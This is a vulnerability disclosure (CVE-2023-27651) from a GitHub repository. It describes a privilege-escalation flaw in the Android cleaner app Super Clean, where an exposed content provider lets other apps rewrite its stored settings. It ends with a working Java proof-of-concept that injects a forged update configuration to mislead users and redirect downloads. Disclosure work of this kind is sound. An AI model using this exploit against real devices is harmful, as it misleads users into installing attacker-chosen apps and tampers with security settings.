CVE-2023-27651: SODA/CVE detail.md at main · LianKee/SODA

Escalation of Privileges exists in Super Clean（CVE-2023-27651）

Vendor：Ego Studio(http://www.egostudiogroup.com/)

Affected product：Super Clean(com.egostudio.clean)

Version：1.1.5 1.1.9

Download link：https://apkpure.com/cn/super-clean-phone-cleaner/com.egostudio.clean/download

Description of the vulnerability for use in the CVE：An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges via the update_info field of the default.xml file.

Additional information：Super Clean is a phone cleaner app for cleaning junk files and optimizing memory usage, it also provides various security-related features such as Wifi security check, app lock, etc. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Super Clean app will not behave properly when loading this data.

​ The attackers can use the update() method in the SharedPrefProvider component exposed by the APP to modify the contents of the SharedPreference file of the APP. The file 'default.xml’ contains a key-value pair named key_self_update_config which records data related to APP updates. By changing the ‘appver’ and ‘type’ fields in the value, the attackers can force the app to trigger the update function. They can then hijack the hint message shown to the user in the update UI by modifying the ‘update_info‘ field to mislead the user. Finally, by modifying the ’packageName‘ field, they can arbitrarily specify the link to which the update button points. (Note that packageName can only be the name of the application package listed in Google Play Market.) This can result in users being induced to download the app specified by the attacker in the application market.

​ Attackers can use similar methods to cause a variety of security hazards. For example, they can allow malicious apps to add themselves to the virus check whitelist (by modifying the KEY_VIRUS_SCAN_WHITELIST field), force the app to initialize all settings (by modifying the key_init_app_finish field), block ads (by modifying the key_ad_new_user_avoid_time field, which affects the developer’s advertising revenue), or control the server URL that the victim app is going to access (by modifying the key_wifi_safe_net_check_url field).To make matters worse, users cannot fix the security issues by simply restarting the app, since the injected data is persistent in the SharedPreference files.

poc：

public void attack(){ ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.egostudio.clean.boost.main.SharedPrefProvider”); while (true) { ContentValues contentValues = new ContentValues(); contentValues.put(“file_name","__default__”); contentValues.put(“type",4); contentValues.put(“key","key_self_update_config”); contentValues.put(“value","{\"channel\":\"clean\",\"country\":[\"全部\”],\"appver\":1000,\"enable\":true,\"force_update\":true,\"type\":1002,\"packageName\":\"com.wuxiafield.novastar\",\"jumpurl\":\"https:\\/\\/play.google.com\\/store\\/apps\\/details?id=com.wuxiafield.novastar\",\"interval_time\":6,\"update_info\":[\"hshadhashdsahdhsadhashdhasdhsahdas\”]}"); contentResolver.update(uri,contentValues,null,null); } }